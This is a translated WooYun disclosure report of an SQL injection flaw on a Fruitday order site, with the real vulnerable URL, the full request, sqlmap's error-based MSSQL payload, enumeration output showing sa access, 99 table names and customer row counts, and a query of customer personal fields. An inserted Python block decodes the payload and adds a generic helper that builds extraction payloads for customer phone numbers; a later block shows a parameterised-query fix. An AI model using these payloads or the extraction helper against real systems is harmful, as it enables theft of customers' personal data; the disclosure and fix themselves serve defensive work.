Vulnerability Summary (24 followers)

Defect ID: wooyun-2015-0135150

Title: SQL injection on a Fruitday (天天果园) site (can leak roughly 270K user records plus order data)

Vendor: fruitday.com

Author: 浮萍

Submitted: 2015-08-19 10:30

Fix time: 2015-10-03 11:44

Published: 2015-10-03 11:44

Type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-08-19: Details sent to the vendor, awaiting vendor handling
2015-08-19: Vendor confirmed; details disclosed to the vendor only
2015-08-29: Details disclosed to core white hats and domain experts
2015-09-08: Details disclosed to regular white hats
2015-09-18: Details disclosed to intern white hats
2015-10-03: Details disclosed to the public

Brief description:

SQL injection vulnerability

Detailed description:

http://hq.fruitday.com:1300/test/

[screenshot: 选区_158.png]


Refresh the page and capture the POST request (the form fields, shown here as a query string):

http://hq.fruitday.com:1300/test/?Button1=%E5%AE%9D%E5%AE%9D%E6%A0%91%E8%AE%A2%E5%8D%95%E5%8F%91%E8%B4%A7%E4%BF%A1%E6%81%AF%E4%B8%8B%E8%BD%BD&__EVENTVALIDATION=%2FwEWBAKd1qmjCwLg2ZN%2BAsKGtEYCjOeKxgZbFZuhaBWiu7NPcvUNo8jE5zfxE0rx7qf7JmIw%2Fsj6SQ%3D%3D&__VIEWSTATE=%2FwEPDwULLTE3NTUxOTMwMTZkZFJW1VwGHd3j1GqENAXwHTs%2FMwjG%2BRntfJIDTWykxfY0&txtEndDate=2015-8-18&txtStartDate=2015-8-17


[screenshot: 选区_160.png]


Enter a single quote (') in the date field:

[screenshot: 选区_161.png]


Proof of vulnerability:

Testing the injection point. The trailing * after txtStartDate is sqlmap's custom injection marker, which is why the finding below is reported as "Parameter: #1* (URI)"; the "0 HTTP(s) requests" count means sqlmap resumed the already-confirmed injection point from its session file rather than re-testing it.

http://hq.fruitday.com:1300/test/?Button1=%E5%AE%9D%E5%AE%9D%E6%A0%91%E8%AE%A2%E5%8D%95%E5%8F%91%E8%B4%A7%E4%BF%A1%E6%81%AF%E4%B8%8B%E8%BD%BD&__EVENTVALIDATION=%2FwEWBAKd1qmjCwLg2ZN%2BAsKGtEYCjOeKxgZbFZuhaBWiu7NPcvUNo8jE5zfxE0rx7qf7JmIw%2Fsj6SQ%3D%3D&__VIEWSTATE=%2FwEPDwULLTE3NTUxOTMwMTZkZFJW1VwGHd3j1GqENAXwHTs%2FMwjG%2BRntfJIDTWykxfY0&txtEndDate=2015-8-18&txtStartDate=2015-8-17*


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: http://hq.fruitday.com:1300/test/?Button1=%E5%AE%9D%E5%AE%9D%E6%A0%91%E8%AE%A2%E5%8D%95%E5%8F%91%E8%B4%A7%E4%BF%A1%E6%81%AF%E4%B8%8B%E8%BD%BD&__EVENTVALIDATION=/wEWBAKd1qmjCwLg2ZN+AsKGtEYCjOeKxgZbFZuhaBWiu7NPcvUNo8jE5zfxE0rx7qf7JmIw/sj6SQ==&__VIEWSTATE=/wEPDwULLTE3NTUxOTMwMTZkZFJW1VwGHd3j1GqENAXwHTs/MwjG+RntfJIDTWykxfY0&txtEndDate=2015-8-18&txtStartDate=2015-08-17' AND 4689=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (4689=4689) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'RnJS'='RnJS
---


web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
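The sqlmap listing above names the technique (Microsoft SQL Server error-based, CONVERT(INT, ...)) but not how a "WHERE clause" error turns into data. The following Python is an added example, not part of the original report and not sqlmap's code: it decodes the CHAR() concatenations in the payload shown above into the random boundary markers sqlmap wraps around its probe, reproduces the error text SQL Server raises when CONVERT(INT, ...) is fed a non-numeric string (the wording of error 245 is a constructed stand-in written from memory; no server is contacted), and pulls the probe result back out of that text the way sqlmap does. The error_based_payload helper at the end generalises the same channel to an arbitrary scalar subquery; it is illustrative only, and the fruit_Customer / custom_Mobile names it is called with are taken from the report's table listing below, not from anything run against the target.

```python
import re

# Payload copied from the sqlmap output above (the txtStartDate value after
# "2015-08-17"). Everything else in this block is an added reconstruction.
SQLMAP_PAYLOAD = (
    "' AND 4689=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(107)+CHAR(106)+CHAR(113)"
    "+(SELECT (CASE WHEN (4689=4689) THEN CHAR(49) ELSE CHAR(48) END))"
    "+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'RnJS'='RnJS"
)

CHAR_CALL = re.compile(r"CHAR\((\d+)\)")

def decode_char_concat(expr):
    """'CHAR(113)+CHAR(107)' -> 'qk': T-SQL strings built one CHAR() at a time so the
    payload contains no quote characters of its own."""
    return "".join(chr(int(n)) for n in CHAR_CALL.findall(expr))

# Shape of sqlmap's MSSQL error-based probe: CONVERT(INT, <prefix> + <CASE probe> + <suffix>)
PAYLOAD_SHAPE = re.compile(
    r"CONVERT\(INT,\(SELECT (?P<pre>(?:CHAR\(\d+\)\+)+)"
    r"\(SELECT \(CASE WHEN \((?P<cond>[^)]*)\) THEN (?P<t>CHAR\(\d+\)) ELSE (?P<f>CHAR\(\d+\)) END\)\)"
    r"\+(?P<post>(?:CHAR\(\d+\)\+?)+)\)\)"
)

def parse_payload(payload):
    """Split the probe into its prefix marker, the condition being asked,
    the two possible answers, and the suffix marker."""
    m = PAYLOAD_SHAPE.search(payload)
    if m is None:
        raise ValueError("not an MSSQL CONVERT(INT, ...) error-based payload")
    return {
        "prefix": decode_char_concat(m.group("pre")),
        "condition": m.group("cond"),
        "if_true": decode_char_concat(m.group("t")),
        "if_false": decode_char_concat(m.group("f")),
        "suffix": decode_char_concat(m.group("post")),
    }

def mssql_convert_int_error(value):
    """Constructed stand-in for SQL Server error 245, which is what the application
    echoed back in its error page. Written from memory, not captured from the target."""
    return f"Conversion failed when converting the varchar value '{value}' to data type int."

def extract_between_markers(error_text, prefix, suffix):
    """What sqlmap does with the HTTP response: take the bytes between its two markers."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), error_text, re.S)
    return m.group(1) if m else None

def simulate_probe(payload, condition_holds):
    """Evaluate the probe as the vulnerable query would: CASE yields '1' or '0',
    CONVERT(INT, 'qkkjq1qqjzq') cannot succeed, and the error message carries the answer."""
    p = parse_payload(payload)
    picked = p["if_true"] if condition_holds else p["if_false"]
    error_text = mssql_convert_int_error(p["prefix"] + picked + p["suffix"])
    return extract_between_markers(error_text, p["prefix"], p["suffix"])

def error_based_payload(subquery, prefix="qkkjq", suffix="qqjzq"):
    """Illustrative generalisation: replace the CASE with any scalar subquery and the
    same conversion error returns its value (up to the error-message length limit).
    Uses quoted literals for readability where sqlmap would use CHAR()."""
    return (f"' AND 1=CONVERT(INT,(SELECT '{prefix}'+CAST(({subquery}) AS NVARCHAR(4000))"
            f"+'{suffix}')) AND 'a'='a")

if __name__ == "__main__":
    print(parse_payload(SQLMAP_PAYLOAD))
    print(simulate_probe(SQLMAP_PAYLOAD, True))   # 1
    print(simulate_probe(SQLMAP_PAYLOAD, False))  # 0
    # Hypothetical next step, never sent: leak one value from a table named in the listing below.
    print(error_based_payload("SELECT TOP 1 custom_Mobile FROM fruit_Customer"))
```

The markers qkkjq and qqjzq are what sqlmap searched the 500 page for; the one-character CASE result is only the confirmation probe, and once that is reliable sqlmap swaps in real subqueries exactly as the last helper does to pull database names, the sa user and the row counts shown further down.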


Databases

available databases [5]:
[*] fday
[*] master
[*] model
[*] msdb
[*] tempdb


Current database and user

current database:    'fday'
current user: 'sa'


Tables in fday

Database: fday
[99 tables]
+----------------------------+
| BagOpLog |
| CCBack |
| CancelQueue |
| CardSales |
| Changes |
| CouponInputs |
| CouponRequest |
| CouponSales |
| CouponSalesReturn |
| DeliveryCar |
| DeliveryOrder |
| DeliveryWave |
| Department |
| Enterprise |
| Gifts |
| InputOrderJson |
| InvoiceReccord |
| InvoiceRequest |
| OkCardBill |
| OnlineBankBill |
| OnlineCoupon |
| OrderBak |
| Payments |
| PaymentsTemp |
| PreSellRule |
| Product |
| ProductItem |
| ReChargeInvoice |
| ReturnOrder |
| ShouldTransferAccounts |
| Staff |
| StateSyncQueue |
| TmalJson |
| UnionPayBillDetails |
| aa |
| dtproperties |
| fruit_Activity |
| fruit_ActivityOrderItem |
| fruit_Bag |
| fruit_BagItem |
| fruit_BagItemSet |
| fruit_BagPkg |
| fruit_BagType |
| fruit_CC |
| fruit_Complaint |
| fruit_ComplaintItem |
| fruit_Coupon |
| fruit_CouponType |
| fruit_Customer |
| fruit_DeliveryPerson |
| fruit_ExtraOrderType |
| fruit_ExtraTask |
| fruit_ExtraTaskItem |
| fruit_ExtraWarehouse |
| fruit_GoldenCardBill |
| fruit_GroupOrder |
| fruit_GroupOrderItem |
| fruit_Menu |
| fruit_OnlinePay |
| fruit_OrderItemV2 |
| fruit_OrderModifyLog |
| fruit_OrderOpRemark |
| fruit_OrderPayInfo |
| fruit_OrderPkg |
| fruit_OrderSerial |
| fruit_OrderV2 |
| fruit_PayMethodReccord |
| fruit_PayMethodReccordV1 |
| fruit_PkgItem |
| fruit_PkgType |
| fruit_Po |
| fruit_PoInStockDetails |
| fruit_PoItem |
| fruit_ProdSingleReturn |
| fruit_ProdType |
| fruit_RefundRecord |
| fruit_Stock |
| fruit_Store |
| fruit_StoreRequestBillItem |
| fruit_StoreRequestPkg |
| fruit_StoreRequstBill |
| fruit_SubMenu |
| fruit_Supplier |
| fruit_SupplierPayment |
| fruit_SupplierProd |
| fruit_UnPaidReccord |
| fruit_User |
| fruit_UserMenu |
| fruit_orderItemBak |
| fruit_orderPayment |
| material_RequestOrder |
| material_RequestOrderItem |
| preOrder |
| preOrderItem |
| sysdiagrams |
| tab_view_product_storage |
| test1 |
| view_OutPutStock |
| view_ReturnProd_OrderNum |
+----------------------------+


select count(*) from fruit_Customer;: '276588'
select count(*) from preOrder;: '17019'
select count(*) from fruit_User;: '377'


Viewing one record

SELECT TOP 1 age_Range, custom_Address, custom_Level, custom_Mobile, custom_Name, custom_Remark, custom_Tel, custom_Type, department, eAddress, eName, enterprise_Id, id, lastorder_Time, order_Count, salesMan, sex  FROM fruit_Customer


[screenshot: 选区_162.png]


The order tables presumably hold orders, the stock tables hold inventory, and the staff table is presumably employees.
I did not look at the other tables.

Fix recommendation:
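The report leaves this section empty. The following is an added Python example, not the site's code (the sqlmap fingerprint above says ASP.NET on SQL Server 2005): an in-memory sqlite table is used as a constructed stand-in to show the pattern the report implies, the txtStartDate/txtEndDate values spliced into the SQL text, beside the hardened form that validates both dates and binds them as parameters. The orders table, its columns and the function names are hypothetical; the injected value is a constructed probe, not the report's payload.

```python
import sqlite3
from datetime import date

def make_db():
    """Constructed in-memory stand-in for an orders table; the real site runs MSSQL."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, order_time TEXT, customer TEXT)")
    db.executemany(
        "INSERT INTO orders (order_time, customer) VALUES (?, ?)",
        [("2015-08-17", "alice"), ("2015-08-18", "bob"), ("2015-08-20", "carol")],
    )
    return db

def orders_vulnerable(db, start, end):
    """The pattern the report implies (hypothetical code): the two date fields are
    spliced straight into the SQL text, so a quote in either one ends the literal
    and the rest of the value becomes SQL."""
    sql = f"SELECT customer FROM orders WHERE order_time BETWEEN '{start}' AND '{end}' ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def parse_iso_date(value):
    """Accept only a real calendar date; '2015-8-17' is normalised to '2015-08-17'.
    Anything else, including every injection attempt, raises ValueError."""
    year, month, day = (int(part) for part in value.strip().split("-"))
    return date(year, month, day).isoformat()

def orders_fixed(db, start, end):
    """Hardened form: values validated, then bound as parameters; the SQL text never
    changes, so the database driver treats the dates as data, not as query syntax."""
    sql = "SELECT customer FROM orders WHERE order_time BETWEEN ? AND ? ORDER BY id"
    params = (parse_iso_date(start), parse_iso_date(end))
    return [row[0] for row in db.execute(sql, params)]

def fixed_rejects(db, start, end):
    """True when the hardened query refuses the input instead of executing it."""
    try:
        orders_fixed(db, start, end)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    injected_end = "2015-08-18' OR '1'='1"  # constructed probe in the same position as the report's
    print(orders_vulnerable(db, "2015-08-17", "2015-08-18"))  # ['alice', 'bob']
    print(orders_vulnerable(db, "2015-08-17", injected_end))   # ['alice', 'bob', 'carol']
    print(orders_fixed(db, "2015-8-17", "2015-8-18"))          # ['alice', 'bob']
    print(fixed_rejects(db, "2015-08-17", injected_end))       # True
```

In the ASP.NET code the same change is SqlCommand parameters (SqlParameter of type Date) instead of string concatenation; the validation step matters as well, because the error page that leaked the CONVERT failure text should also be replaced by a generic error so that error-based extraction has no channel even if another query is missed. Running the application as sa, as the report shows, is a separate finding: a least-privilege login limited to the fday tables it needs would have kept master, msdb and the rest of the server out of reach.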

Copyright notice: when reproducing, credit the source: 浮萍@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-08-19 11:43

Vendor reply:

Thank you very much for the information you provided; we will confirm it as soon as possible.

Latest status:

None yet